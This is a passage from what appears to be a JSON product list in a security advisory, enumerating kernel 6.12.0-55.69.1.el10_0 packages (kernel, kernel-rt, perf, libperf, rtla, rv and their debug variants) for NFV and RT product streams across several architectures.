"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
